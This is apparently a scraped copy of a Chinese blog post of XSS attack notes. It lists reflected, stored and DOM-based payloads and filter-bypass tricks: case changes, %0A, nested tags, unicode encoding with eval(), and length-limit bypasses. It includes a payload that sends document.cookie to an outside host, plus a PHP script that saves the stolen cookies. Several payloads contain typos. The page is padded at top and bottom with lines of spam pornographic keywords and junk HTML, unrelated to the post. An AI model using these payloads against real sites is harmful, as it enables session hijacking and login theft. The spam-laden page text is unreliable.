<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      XSS攻擊

      XSS攻擊

      點擊查看代碼
      <script>alert('xss')</script>
      <script>alert(document.cookie)</script>  #顯示出cookie信息
      <script>document.location='http://www.test.com/cookie.php?cookie='+document.cookie;</script>  需要進行URL編碼
      # cookie.php   反射型XSS獲取cookie,登錄后臺
      <?php
      $cookie = $_GET['cookie'];
      file_put_contents("cookie.txt",$cookie);
      

      存儲型xss漏洞,數據寫入數據庫中,利用img標簽,如果出現損壞的小圖標,就說明存在存儲型xss漏洞
      <img src=1 onerror = alter'1'> 如果前面的src=1沒有正常執行,就會調用onerror = '111'

      • 無法使用<>:以下三行代碼可在<>里面寫
        onclick=alter(1)// 點擊后觸發
        Onmousemove 當鼠標移動就觸發 Onmousemove=alter(1)
        Onload 當頁面加載完成后觸發
      • 將on、script等字符分割:
        <a href=javascript:alert(1)>Clickme</a> 需要先閉合<>、""這些
      • 將on、script等以及href字符分割:更改大小寫看是否可行
      • 過濾比較多:可以使用unicode編碼形式繞過
        基于DOM的XSS
        基于DOM文檔對象模型漏洞的一種攻擊方式,不依賴于服務器端的數據,而從客戶端獲得DOM中的數據并在本地執行。
        通過JS腳本對文檔對象進行編輯從而修改頁面中的元素。
        url+#javascript:alert(1) javascript偽協議
        判斷是否存在DOM型XSS的關鍵是觀察我們的HTML源代碼中是否存在相關的js函數
        location.hash
        location.href
        innerHTML
        document.write
        eval("var x = "'+location.hash + ""');
        localStorge、SessionStorge、Cookies

      利用與繞過

      • 大小寫繞過

      這個繞過方式的出現是因為網站僅僅只過濾了<script>標簽,而沒有考慮標簽中的大小寫并不影響瀏覽器的解釋所致。

      • %0A繞過

        換行符沒有過濾,使用%0A進行繞過

      http://www.zixem.altervista.org/XSS/3.php?name=zxm%0A<script>alert("1337");</script>

      • 利用過濾后返回語句再次構成攻擊語句來繞過

      我們直接敲入script標簽發現返回的網頁代碼中script標簽被去除了,但其余的內容并沒有改變。
      這個利用原理在于只過濾了一個script標簽。例如:scscriptript

      • 并不是只有script標簽才可以插入代碼

        例如這里我們用標簽做一個示范。

        我們利用如下方式:
        `

        [http://192.168.1.102/xss/example4.php?name=
        src='w.123' onerror='alert("hey!")'>
        `
        就可以再次愉快的彈窗。原因很簡單,我們指定的圖片地址根本不存在也就是一定會發生錯誤,這時候onerror里面的代碼自然就得到了執行。

        以下列舉幾個常用的可插入代碼的標簽。

        <a onmousemove=’do something here’> 
        

        當用戶鼠標移動時即可運行代碼

        <div onmouseover=‘do something here’> 
        

        當用戶鼠標在這個塊上面時即可運行(可以配合weight等參數將div覆蓋頁面,鼠標不劃過都不行)

        類似的還有onclick,這個要點擊后才能運行代碼,條件相對苛刻,就不再詳述。

        編碼腳本代碼繞過關鍵字過濾

        有的時候,服務器往往會對代碼中的關鍵字(如alert)進行過濾,這個時候我們可以嘗試將關鍵字進行編碼后再插入,不過直接顯示編碼是不能被瀏覽器執行的,我們可以用另一個語句eval()來實現。eval()會將編碼過的語句解碼后再執行,簡直太貼心了。

        例如alert(1)編碼過后就是

        \u0061\u006c\u0065\u0072\u0074(1)
        
        eval()函數:可計算字符串,并執行其中的javaScript代碼
        <script>eval("alert('xss')");</script>
        可以使用\連接十六進制字符串,然后使用eval()函數執行十六進制字符串形式的腳本
        
        
      • 主動閉合標簽實現注入代碼

        這個時候就要我們手動閉合掉兩個雙引號來實現攻擊,別忘了,javascript是一個弱類型的編程語言,變量的類型往往并沒有明確定義。

      • 繞過長度限制

        假設下面代碼存在一個XSS漏洞:

      <input type = text value='$var'/>

      服務器端對輸出變量$var做了嚴格的長度限制,那么攻擊者可能會這樣構造XSS:

      $var='><script>alter(/xss/)</script>'

      希望達到的輸出效果是:

      <input type=text value=''><script>alter(/xss/)</script>'/>

      假設長度限制為20個字節,則這段xss會被切割為

      $var輸出為:'><script>alter(/xss

      $var='onclick =alter(1)//

           -  可用注釋符繞過長度限制   ><!-- -->
      
      posted @ 2022-01-16 16:46  開心消消樂a  閱讀(140)  評論(0)    收藏  舉報
      主站蜘蛛池模板: 护士张开腿被奷日出白浆| 国产精品无码无需播放器| 国产成人精品永久免费视频| 亚洲A综合一区二区三区| 人人妻人人澡人人爽| 日韩人妻无码精品久久| 国产精品无遮挡猛进猛出| 欧美性大战xxxxx久久久| 蜜桃成熟色综合久久av| 崇文区| 亚洲精品一区二区三区免| 国产不卡一区不卡二区| 久久天天躁狠狠躁夜夜婷| 久久精品免视看国产成人| 国产精品美女一区二区三| 老师扒下内裤让我爽了一夜| XXXXXHD亚洲日本HD| 精品国产成人网站一区在线| 亚洲天堂av 在线| 久久人妻精品国产| 亚洲综合在线日韩av| 日韩国产中文字幕精品| 一级做a爰片在线播放| 色偷偷偷久久伊人大杳蕉| 亚洲av永久一区二区| 精品人妻中文字幕av| 欧美熟妇乱子伦XX视频| 最新午夜男女福利片视频| 中文字幕人妻av第一区| 美腿丝袜亚洲综合第一页| 性欧美暴力猛交69hd| 国内精品久久久久影院薰衣草| 奶头好大揉着好爽视频| 人妻系列无码专区久久五月天| 无码人妻一区二区三区AV| 人妻另类 专区 欧美 制服| 国产精品最新免费视频| 国产99视频精品免费专区| 亚洲欧美日韩尤物AⅤ一区| 精品国产女同疯狂摩擦2| 国产精品∧v在线观看|